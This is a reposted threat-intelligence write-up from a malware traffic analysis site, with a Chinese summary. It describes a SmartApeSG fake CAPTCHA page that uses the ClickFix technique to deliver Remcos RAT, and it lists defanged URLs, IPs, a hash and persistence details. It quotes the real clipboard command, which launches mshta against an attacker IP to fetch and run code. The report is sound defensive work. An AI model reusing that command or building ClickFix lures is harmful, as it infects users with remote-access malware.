2026-01-06: SmartApeSG CAPTCHA page uses ClickFix technique for Remcos RAT

2026-01-06: SmartApeSG CAPTCHA page uses ClickFix technique for Remcos RAT
合法网站被黑用于传播Remcos RAT恶意软件，攻击者利用SmartApeSG虚假Captcha页面和ClickFix技术诱导用户点击下载恶意包，并通过DLL侧加载和注册表更新实现持久化。 2026-1-6 17:48:0 Author: www.malware-traffic-analysis.net(查看原文) 阅读量:7 收藏

2026-01-06 (TUESDAY): SMARTAPESG CAPTCHA PAGE USES CLICKFIX TECHNIQUE FOR REMCOS RAT

NOTICE:

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

ASSOCIATED FILES:

2026-01-06-IOCs-for-SmartApeSG-ClickFix-to-Remcos-RAT.txt.zip 1.2 kB (1,224 bytes)
2026-01-06-SmartApeSG-ClickFix-for-Remcos-RAT.pcap.zip 56.9 MB (56,932,975 bytes)
2026-01-06-SmartApeSG-files.zip 41.1 MB (41,083,107 bytes)

2026-01-06 (TUESDAY): SMARTAPESG CAPTCHA PAGE USES CLICKFIX TECHNIQUE FOR REMCOS RAT

LEGITIMATE BUT COMPROMISED SITE:

- [information removed]

INJECTED SMARTAPESG SCRIPT:

- hxxps[:]//dinozozo[.]com/menu.js

TRAFFIC FOR SMARTAPESG FAKE CAPTCHA PAGE:

- hxxps[:]//pippyheydguide[.]com/redirect/profile-script.js
- hxxps[:]//pippyheydguide[.]com/redirect/middleware-service.php?gvefGY13
- hxxps[:]//pippyheydguide[.]com/redirect/middleware-effect.js?2718cdb882b4f057aa

CLICKFIX SCRIPT INJECTED INTO CLIPBOARD:

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta hxxp[:]//193.111.208[.]238/auth"

TRAFFIC GENERATED BY CLICKFIX SCRIPT:

- hxxp[:]//193.111.208[.]238/auth [301 Moved Permanently]
- hxxps[:]//lpiaretes[.]com/auth

- hxxp[:]//193.111.208[.]238/byte [301 Moved Permanently]
- hxxps[:]//lpiaretes[.]com/byte

DOWNLOADED PACKAGE FOR REMCOS RAT:

- SHA256 hash: bcf13c1e79ebffba07dcc635c05a5d2f826fe75b4e69f7541b6ce6af4a5e31c0
- File size: 41,523,044 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- Retrieved from: hxxps[:]//lpiaretes[.]com/byte
- Example of saved file location: C:\Users\[username]\AppData\Local\230061.pdf
- Note: the 6-digit number used in the saved file location is unique for each infection

REMCOS RAT CHARACTERISTICS:

- Post-infection HTTPS C2 traffic to 192.144.56.80:443 (self-signed certificate)
- Remcos RAT package uses DLL side-loading with a legitimate EXE.
- Made persistent through both a scheduled task and a Windows registry update
  -- Task and registry update name: Intel PLLQ Components
  -- Command: C:\Users\[username]\AppData\Local\230061\mega_altpllq.exe

IMAGES

Shown above: Example of a legitimate but compromised site showing the SmartApeSG fake CAPTCHA page.

Shown above: HTTPS URLs from the infection run.

Shown above: Traffic from an infection filtered in Wireshark.

Shown above: Remcos RAT infection persistent on an infected Windows host.

Click here to return to the main page.

文章来源: https://www.malware-traffic-analysis.net/2026/01/06/index.html
如有侵权请联系:admin#unsafe.sh